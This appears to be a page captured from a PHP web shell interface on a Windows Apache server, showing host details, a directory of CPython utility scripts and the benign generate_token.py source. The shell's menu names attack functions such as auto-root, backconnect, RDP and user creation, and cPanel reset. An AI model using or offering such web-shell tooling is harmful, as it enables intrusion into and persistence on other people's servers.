Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
Tools /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxrwxrwx
2to3.py
101
B
-rw-rw-rw-
abitype.py
5.64
KB
-rw-rw-rw-
analyze_dxp.py
4.21
KB
-rw-rw-rw-
byext.py
3.94
KB
-rw-rw-rw-
byteyears.py
1.67
KB
-rw-rw-rw-
checkpip.py
825
B
-rw-rw-rw-
cleanfuture.py
8.69
KB
-rw-rw-rw-
combinerefs.py
4.48
KB
-rw-rw-rw-
copytime.py
689
B
-rw-rw-rw-
crlf.py
655
B
-rw-rw-rw-
db2pickle.py
3.68
KB
-rw-rw-rw-
diff.py
2.26
KB
-rw-rw-rw-
dutree.py
1.66
KB
-rw-rw-rw-
eptags.py
1.6
KB
-rw-rw-rw-
find-uname.py
1.22
KB
-rw-rw-rw-
find_recursionlimit.py
4.03
KB
-rw-rw-rw-
finddiv.py
2.56
KB
-rw-rw-rw-
findlinksto.py
1.09
KB
-rw-rw-rw-
findnocoding.py
2.99
KB
-rw-rw-rw-
fixcid.py
10.24
KB
-rw-rw-rw-
fixdiv.py
14.28
KB
-rw-rw-rw-
fixheader.py
1.38
KB
-rw-rw-rw-
fixnotice.py
3.06
KB
-rw-rw-rw-
fixps.py
923
B
-rw-rw-rw-
generate_opcode_h.py
2.25
KB
-rw-rw-rw-
generate_stdlib_module_names.p...
4.7
KB
-rw-rw-rw-
generate_token.py
7.08
KB
-rw-rw-rw-
get-remote-certificate.py
2.7
KB
-rw-rw-rw-
google.py
526
B
-rw-rw-rw-
gprof2html.py
2.33
KB
-rw-rw-rw-
highlight.py
9.21
KB
-rw-rw-rw-
ifdef.py
3.73
KB
-rw-rw-rw-
import_diagnostics.py
1.01
KB
-rw-rw-rw-
lfcr.py
664
B
-rw-rw-rw-
linktree.py
2.46
KB
-rw-rw-rw-
lll.py
775
B
-rw-rw-rw-
mailerdaemon.py
8.09
KB
-rw-rw-rw-
make_ctype.py
2.32
KB
-rw-rw-rw-
md5sum.py
2.55
KB
-rw-rw-rw-
mkreal.py
1.66
KB
-rw-rw-rw-
ndiff.py
3.86
KB
-rw-rw-rw-
nm2def.py
2.53
KB
-rw-rw-rw-
objgraph.py
6.01
KB
-rw-rw-rw-
parse_html5_entities.py
4.01
KB
-rw-rw-rw-
parseentities.py
1.76
KB
-rw-rw-rw-
patchcheck.py
10.81
KB
-rw-rw-rw-
pathfix.py
6.85
KB
-rw-rw-rw-
pdeps.py
4.07
KB
-rw-rw-rw-
pep384_macrocheck.py
4.75
KB
-rw-rw-rw-
pickle2db.py
4.07
KB
-rw-rw-rw-
pindent.py
17.22
KB
-rw-rw-rw-
ptags.py
1.34
KB
-rw-rw-rw-
pydoc3.py
85
B
-rw-rw-rw-
pysource.py
3.9
KB
-rw-rw-rw-
reindent-rst.py
293
B
-rw-rw-rw-
reindent.py
11.7
KB
-rw-rw-rw-
rgrep.py
1.61
KB
-rw-rw-rw-
run_tests.py
1.83
KB
-rw-rw-rw-
serve.py
1.23
KB
-rw-rw-rw-
smelly.py
5.07
KB
-rw-rw-rw-
stable_abi.py
20.91
KB
-rw-rw-rw-
suff.py
536
B
-rw-rw-rw-
texi2html.py
70.75
KB
-rw-rw-rw-
untabify.py
1.32
KB
-rw-rw-rw-
update_file.py
790
B
-rw-rw-rw-
var_access_benchmark.py
11.92
KB
-rw-rw-rw-
verify_ensurepip_wheels.py
3.21
KB
-rw-rw-rw-
which.py
1.71
KB
-rw-rw-rw-
win_add2path.py
1.68
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generate_token.py
#! /usr/bin/env python3 # This script generates token related files from Grammar/Tokens: # # Doc/library/token-list.inc # Include/token.h # Parser/token.c # Lib/token.py NT_OFFSET = 256 def load_tokens(path): tok_names = [] string_to_tok = {} ERRORTOKEN = None with open(path) as fp: for line in fp: line = line.strip() # strip comments i = line.find('#') if i >= 0: line = line[:i].strip() if not line: continue fields = line.split() name = fields[0] value = len(tok_names) if name == 'ERRORTOKEN': ERRORTOKEN = value string = fields[1] if len(fields) > 1 else None if string: string = eval(string) string_to_tok[string] = value tok_names.append(name) return tok_names, ERRORTOKEN, string_to_tok def update_file(file, content): try: with open(file, 'r') as fobj: if fobj.read() == content: return False except (OSError, ValueError): pass with open(file, 'w') as fobj: fobj.write(content) return True token_h_template = """\ /* Auto-generated by Tools/scripts/generate_token.py */ /* Token types */ #ifndef Py_LIMITED_API #ifndef Py_TOKEN_H #define Py_TOKEN_H #ifdef __cplusplus extern "C" { #endif #undef TILDE /* Prevent clash of our definition with system macro. Ex AIX, ioctl.h */ %s\ #define N_TOKENS %d #define NT_OFFSET %d /* Special definitions for cooperation with parser */ #define ISTERMINAL(x) ((x) < NT_OFFSET) #define ISNONTERMINAL(x) ((x) >= NT_OFFSET) #define ISEOF(x) ((x) == ENDMARKER) #define ISWHITESPACE(x) ((x) == ENDMARKER || \\ (x) == NEWLINE || \\ (x) == INDENT || \\ (x) == DEDENT) PyAPI_DATA(const char * const) _PyParser_TokenNames[]; /* Token names */ PyAPI_FUNC(int) PyToken_OneChar(int); PyAPI_FUNC(int) PyToken_TwoChars(int, int); PyAPI_FUNC(int) PyToken_ThreeChars(int, int, int); #ifdef __cplusplus } #endif #endif /* !Py_TOKEN_H */ #endif /* Py_LIMITED_API */ """ def make_h(infile, outfile='Include/token.h'): tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile) defines = [] for value, name in enumerate(tok_names[:ERRORTOKEN + 1]): defines.append("#define %-15s %d\n" % (name, value)) if update_file(outfile, token_h_template % ( ''.join(defines), len(tok_names), NT_OFFSET )): print("%s regenerated from %s" % (outfile, infile)) token_c_template = """\ /* Auto-generated by Tools/scripts/generate_token.py */ #include "Python.h" #include "token.h" /* Token names */ const char * const _PyParser_TokenNames[] = { %s\ }; /* Return the token corresponding to a single character */ int PyToken_OneChar(int c1) { %s\ return OP; } int PyToken_TwoChars(int c1, int c2) { %s\ return OP; } int PyToken_ThreeChars(int c1, int c2, int c3) { %s\ return OP; } """ def generate_chars_to_token(mapping, n=1): result = [] write = result.append indent = ' ' * n write(indent) write('switch (c%d) {\n' % (n,)) for c in sorted(mapping): write(indent) value = mapping[c] if isinstance(value, dict): write("case '%s':\n" % (c,)) write(generate_chars_to_token(value, n + 1)) write(indent) write(' break;\n') else: write("case '%s': return %s;\n" % (c, value)) write(indent) write('}\n') return ''.join(result) def make_c(infile, outfile='Parser/token.c'): tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile) string_to_tok['<>'] = string_to_tok['!='] chars_to_token = {} for string, value in string_to_tok.items(): assert 1 <= len(string) <= 3 name = tok_names[value] m = chars_to_token.setdefault(len(string), {}) for c in string[:-1]: m = m.setdefault(c, {}) m[string[-1]] = name names = [] for value, name in enumerate(tok_names): if value >= ERRORTOKEN: name = '<%s>' % name names.append(' "%s",\n' % name) names.append(' "<N_TOKENS>",\n') if update_file(outfile, token_c_template % ( ''.join(names), generate_chars_to_token(chars_to_token[1]), generate_chars_to_token(chars_to_token[2]), generate_chars_to_token(chars_to_token[3]) )): print("%s regenerated from %s" % (outfile, infile)) token_inc_template = """\ .. Auto-generated by Tools/scripts/generate_token.py %s .. data:: N_TOKENS .. data:: NT_OFFSET """ def make_rst(infile, outfile='Doc/library/token-list.inc'): tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile) tok_to_string = {value: s for s, value in string_to_tok.items()} names = [] for value, name in enumerate(tok_names[:ERRORTOKEN + 1]): names.append('.. data:: %s' % (name,)) if value in tok_to_string: names.append('') names.append(' Token value for ``"%s"``.' % tok_to_string[value]) names.append('') if update_file(outfile, token_inc_template % '\n'.join(names)): print("%s regenerated from %s" % (outfile, infile)) token_py_template = '''\ """Token constants.""" # Auto-generated by Tools/scripts/generate_token.py __all__ = ['tok_name', 'ISTERMINAL', 'ISNONTERMINAL', 'ISEOF'] %s N_TOKENS = %d # Special definitions for cooperation with parser NT_OFFSET = %d tok_name = {value: name for name, value in globals().items() if isinstance(value, int) and not name.startswith('_')} __all__.extend(tok_name.values()) EXACT_TOKEN_TYPES = { %s } def ISTERMINAL(x): return x < NT_OFFSET def ISNONTERMINAL(x): return x >= NT_OFFSET def ISEOF(x): return x == ENDMARKER ''' def make_py(infile, outfile='Lib/token.py'): tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile) constants = [] for value, name in enumerate(tok_names): constants.append('%s = %d' % (name, value)) constants.insert(ERRORTOKEN, "# These aren't used by the C tokenizer but are needed for tokenize.py") token_types = [] for s, value in sorted(string_to_tok.items()): token_types.append(' %r: %s,' % (s, tok_names[value])) if update_file(outfile, token_py_template % ( '\n'.join(constants), len(tok_names), NT_OFFSET, '\n'.join(token_types), )): print("%s regenerated from %s" % (outfile, infile)) def main(op, infile='Grammar/Tokens', *args): make = globals()['make_' + op] make(infile, *args) if __name__ == '__main__': import sys main(*sys.argv[1:])
Close